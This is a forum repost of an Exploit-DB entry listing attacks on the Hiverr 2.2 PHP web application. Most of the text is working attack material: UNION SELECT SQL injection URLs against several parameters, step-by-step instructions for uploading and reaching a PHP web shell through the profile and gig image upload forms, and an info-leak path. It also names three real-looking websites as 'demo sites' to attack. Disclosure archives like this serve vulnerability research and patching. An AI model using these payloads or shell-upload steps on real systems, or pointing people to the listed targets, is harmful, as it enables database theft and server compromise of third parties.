- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24462
- Проверка EDB
-
- Пройдено
- Автор
- XSTARCODE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2013-02-06
Hiverr 2.2 - Multiple Vulnerabilities
Код:
# Exploit Title: Hiverr v2.2 Multiple Vulnerabilities
# Date: 05.02.2013
# Author: xStarCode
# Exploit Author: xStarCode
# Version: 2.2
# Category: webapps
# Google Dork: *
# Tested on: Linux
# Exploit:
-----Index Vulnerabilities:
==>
SQL Injections
http://localhost/gig_desc.php?No=-13+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11--
http://localhost/categorygigs.php?category=-0+UNION+SELECT+1,version(),3,4,5,6,7--
http://localhost/categorygigs.php?category=&mny=-100+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11--
<==
-----User Panel Vulnerabilities:
==>
SQL Injection
http://localhost/inbox_detail.php?userid=31&recpid=31&gig=-15+UNION+SELECT+1,2,3,version(),5,6,7,8--
<==
-----Multiple Shell Upload:
==>
Go to http://localhost/profilesetting.php
And upload a PHP Shell to "Profile Image"
View source:
<img src="profileimage/*****SHELL*****_.php" alt="image" height="100" width="100">
Go to http://localhost/profileimage/*****SHELL*****_.php
<==
next -
==>
Go to "Greate Gig" http://localhost/addnewgig.php
And upload a PHP Shell to "Add Image"
View source:
<td width="107">
<img src="gigimages/*****SHELL*****_.php" height="76" width="106">
</td>
Go to http://localhost/gigimages/*****SHELL*****_.php
<==
-----PHP Info Leak:
==>
Go to http://localhost/nitintest.php
<==
# Demo sites:
http://trabajoenlinea.net/
http://aramar.jp/
http://www.seostinger.com/
#
______ Xo
|
|
/ | \
;_/,X_,\_;
\._/x x\_./
\_./(::)\._/
___ xStarCode
#
Author Mail: [email protected]
Author Website: www.xstarcode.wordpress.com
#
- Источник
- www.exploit-db.com